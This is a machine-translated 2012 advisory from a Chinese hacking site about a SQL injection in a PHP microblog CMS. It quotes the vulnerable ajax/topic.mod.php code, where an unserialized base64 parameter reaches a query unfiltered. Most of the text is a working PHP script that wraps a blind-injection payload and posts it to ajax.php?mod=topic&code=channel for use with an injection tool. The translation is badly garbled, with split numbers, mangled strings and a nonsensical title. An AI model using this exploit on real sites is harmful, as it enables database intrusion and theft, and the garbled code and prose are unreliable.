Notes dog a pittance latest injection vulnerability-vulnerability warning-the black bar safety net

2012-11-05T00:00:00
ID MYHACK58:62201235418
Type myhack58
Reporter 佚名
Modified 2012-11-05T00:00:00

Description

/modules/ajax/topic.mod.php

function Pic_ajax() {//echo 1 1; //echo base64_encode(serialize(array('a'=>'0\'#'))); $options = array(); $TopicListLogic = Load::logic('topic_list', 1); $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 2 0; $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 1 0; $uid = $this->Post['uid'] ? $this->Post['uid'] : "; if($this->Code =='channel'){ $id = $this->Post['id'] ? $this->Post['id'] : "; //get $options = array( 'item'=>'channel', 'item_id' => unserialize(base64_decode($id)),//decoding for Base64, so disregard the Gpc. to. 'perpage' => $per_page_num, ); $info = $TopicListLogic->get_data($options);//a query function which also didn't do any filtering

get_data($param, $caller = "web") .....

$item_ids = $this->_process_param($param['item_id']);//here the assignment $item = trim($param['item']); ..... $where_sql = ($perm_sql ? "AND {$perm_sql}" : "). (isset($param['tid']) ? 'AND tid IN ('. jimplode($tids).') ': "). ($roottids ? 'AND roottid IN ('. jimplode($roottids).') ': "). ($from ? "AND from='{$from}' " : "). ($item_ids ? "AND item_id IN (". jimplode($item_ids).") ": ").// Written statement ($item ? "AND item='{$item}' " : "). (the$content ? "AND content='{$content}' " : "). ($content2 ? "AND content2='{$content2}' " : "). ($filter_sql ? ' and '.$ filter_sql : ");

test

! [](http://www.mcbang.com/data/attachment/portal/201211/05/092237d9qcbswogwdqywdt.jpg.thumb.jpg)

May be injected into more trouble Should be no echo can only blind So I wrote transit program lost Tool run

<? php $data=base64_encode(serialize(array('a'=>'0\') and 1='.$ _GET[id].'#'))); $flag = 0; $post = "; $errno = "; $errstr = ";

$host='127.0.0.1'; $path='/jsg'; $argv = array( 'id'=>$data, );

foreach ($argv as $key=>$value) { if ($flag!= 0) { $post .= "&"; $flag = 1; } $post.= $key."="; $post.= urlencode($value); $flag = 1; } $length = strlen($post); //Create socket connection $fp = fsockopen("$host",8 0,$errno,$errstr,1 0) or exit($errstr."--->".$ errno); //Construct the post request header $header = "POST {$path}/ajax. php? mod=topic&code=channel HTTP/1.1\r\n"; $header .= "Host: {$host}\r\n"; $header .= "Referer: /flandy/post. php\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".$ length."\ r\n"; $header .= "Connection: Close\r\n\r\n"; //Add the post string $header .= $post."\ r\n";

//Send post data fputs($fp,$header); $inheader = 1; while (! feof($fp)) { $line = fgets($fp,1 0 2 4); //Remove the request packet header shows only the page of data returned if ($inheader && ($line == "\n" || $line == "\r\n")) { $inheader = 0; } if ($inheader == 0) { echo $line; } }

fclose($fp);

?>

Run up the speed also to improvise

!